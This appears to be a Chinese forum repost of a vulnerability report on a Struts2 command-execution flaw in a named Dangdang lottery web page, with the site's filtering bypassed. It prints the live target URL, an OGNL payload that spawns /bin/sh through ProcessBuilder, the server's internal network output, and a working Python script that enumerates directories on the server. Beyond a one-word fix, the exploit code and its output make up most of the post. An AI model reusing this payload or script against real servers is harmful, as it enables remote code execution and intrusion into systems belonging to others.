HanDs
管理员

[7月漏洞公开] 神器而已之当当某站Struts2命令执行漏洞(绕过过滤) 



神器在手,天下我有。

详细说明:

从TangScan提交插件赚取汤圆购买了另一个插件,扫到当当一个站点的Struts2命令执行:

1.png





漏洞地址:http://caipiao.dangdang.com/cbportal/usercenter/hemai.htm

此处应有防护或过滤,之前的Payload都不好使了。

测试Payload:

2.png



3.png





列目录:

4.png



5.png





执行命令:

6.png



7.png





ifconfig的结果解码后:

code 区域
eth0      Link encap:Ethernet  HWaddr 90:B1:1C:4C:A9:F2  
inet addr:192.168.1.203 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::92b1:1cff:fe4c:a9f2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3425084210 errors:0 dropped:15 overruns:0 frame:4604
TX packets:2920393573 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2642679068898 (2.4 TiB) TX bytes:1537753012738 (1.3 TiB)
Interrupt:194 Memory:d91a0000-d91b0000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:910780964 errors:0 dropped:0 overruns:0 frame:0
TX packets:910780964 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:484110986527 (450.8 GiB) TX bytes:484110986527 (450.8 GiB)

virbr0 Link encap:Ethernet HWaddr 00:00:00:00:00:00
inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:26 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:4022 (3.9 KiB)





证实漏洞存在,不再深入,执行命令的Payload附在下面:

code 区域
${"~["+new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.ProcessBuilder(new java.lang.String[]{'/bin/sh','-c','ifconfig|base64 -w 0'}).start().getInputStream())).readLine()+"]~"}





列目录脚本:

code 区域
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import re
import base64
import requests

path = '/usr/local/bea/'#要读取的路径
url = "http://caipiao.dangdang.com/cbportal/usercenter/hemai.htm"#漏洞URL
data = """--289b3f46292c4eee95g3f64e37d6f4dc\r\nContent-Disposition: form-data; name="redirect:/${"~["+new java.io.File("%s").listFiles()[%s]+"]~"}"\r\n\r\n10498\r\n--289b3f46292c4eee95g3f64e37d6f4dc--"""
try:
headers = {
'Content-Type': 'multipart/form-data; boundary=289b3f46292c4eee95g3f64e37d6f4dc',
'User-Agent': 'Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9'
}
for x in range(0, 400):
response = requests.post(url, data = data % (path, str(x)), headers=headers, timeout=5, verify=False, allow_redirects=False)
result = re.findall(r'~\[(.*?)\]~', response.content, re.S|re.I)
if len(result) !=0:
print(result[0])
else:
print("Result End.....")
break
except Exception, e:
print(str(e))



漏洞证明:

列目录:

4.png



5.png





执行命令:

6.png



7.png



8.png

修复方案:

升级


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
神器 而已 当当 S tr ut s2
#1楼
发帖时间:2016-7-18   |   查看数:0   |   回复数:0
游客组
快速回复